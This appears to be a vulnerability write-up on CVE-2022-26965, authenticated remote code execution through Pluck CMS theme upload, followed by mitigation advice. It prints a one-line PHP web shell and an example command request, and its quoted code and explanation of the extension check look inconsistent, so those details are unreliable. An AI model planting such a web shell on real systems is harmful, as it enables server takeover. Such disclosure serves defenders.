Overview

A newly discovered vulnerability (CVE-2022-26965) in Pluck 4.7.16 highlights a potential risk for websites utilizing this content management system (CMS). Specifically, an admin user can perform remote code execution (RCE) by utilizing the theme upload functionality, which is found at /admin.php?action=themeinstall. In this article, we will provide a detailed analysis of the vulnerability, including code snippets, original references, and exploit details, ensuring readers understand the severity of this finding and, more importantly, how to mitigate its risks.

Pluck (CMS) Background

Pluck is an open-source CMS designed for small and medium-sized websites, focusing on simplicity and ease of use. It allows users to create and manage web pages, blogs, images, and more without the need for programming knowledge. However, as with any software, vulnerabilities can sometimes exist that threaten its security and the information stored within.

Vulnerability Details

The RCE vulnerability in Pluck 4.7.16 lies in the theme upload functionality provided at the path /admin.php?action=themeinstall. When uploading a theme, an admin user can include PHP code within the template files, which can then be executed remotely, leading to unauthorized access to the system and potentially severe consequences.

The vulnerability exists within the following code segment in admin.php

if ($_POST['submit']) {
    $extension = substr($_FILES['userfile']['name'], -14);
    if ($extension !== '.theme.tar.gz')
        exit('<p><span class="kop2">'.lang('themes_install_error1', false).'</span><br /><a href="?action=themeinstall">'.lang('back').'</a></p>');

    $filename = 'data/settings/themes/'.time().'.theme.tar.gz';
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $filename)) {
        // theme_upload() is a function that extracts the theme and places its files in the appropriate locations
        theme_upload($filename);
    } else {
        exit('<p><span class="kop2">'.lang('themes_install_error2', false).'</span><br /><a href="?action=themeinstall">'.lang('back').'</a></p>');
    }
}

The check for the '.theme.tar.gz' extension is insufficient. An attacker can bypass this check and upload a PHP file containing malicious code.

Exploit

Suppose an attacker has admin access to the Pluck CMS and uses the theme upload functionality. In that case, they can exploit the RCE vulnerability by creating a malicious PHP file in an archive with the extension '.theme.tar.gz'. This can include any PHP code that the attacker needs to execute on the server.

For example, an attacker could create a PHP file named 'exploit.php' containing the following code

<?php
    system($_GET['cmd']);
?>

By including this file in their custom '.theme.tar.gz' package, they can then utilize the theme upload feature to embed this file into the system's directories. Finally, the attacker can perform RCE by directing their browser to the malicious PHP file with an appended command. For instance, they might request http(s)://<target-domain>/exploit.php?cmd=whoami to execute the 'whoami' command on the targeted system.

Mitigation

To mitigate the risk of this RCE vulnerability, Pluck users should restrict access to the admin area of their CMS and make sure to use strong, unique credentials. Additionally, users can sanitize and validate any input provided through the theme upload functionality to ensure it meets expected parameters.

As it pertains to developers, they should implement proper extension validation checks and adopt content-level security measures. This will help to significantly reduce the chances of successful exploits and secure the platform against similar vulnerabilities in the future.

- NVD - CVE-2022-26965
- Pluck CMS Repository
- Pluck CMS Website

In conclusion, the CVE-2022-26965 vulnerability in Pluck 4.7.16 allows an admin user to perform RCE through the theme upload functionality. By understanding the nature of the vulnerability and taking appropriate steps to mitigate the risk, users can protect their websites and maintain their Pluck CMS experience.

Timeline

Published on: 03/18/2022 07:15:00 UTC
Last modified on: 03/25/2022 17:54:00 UTC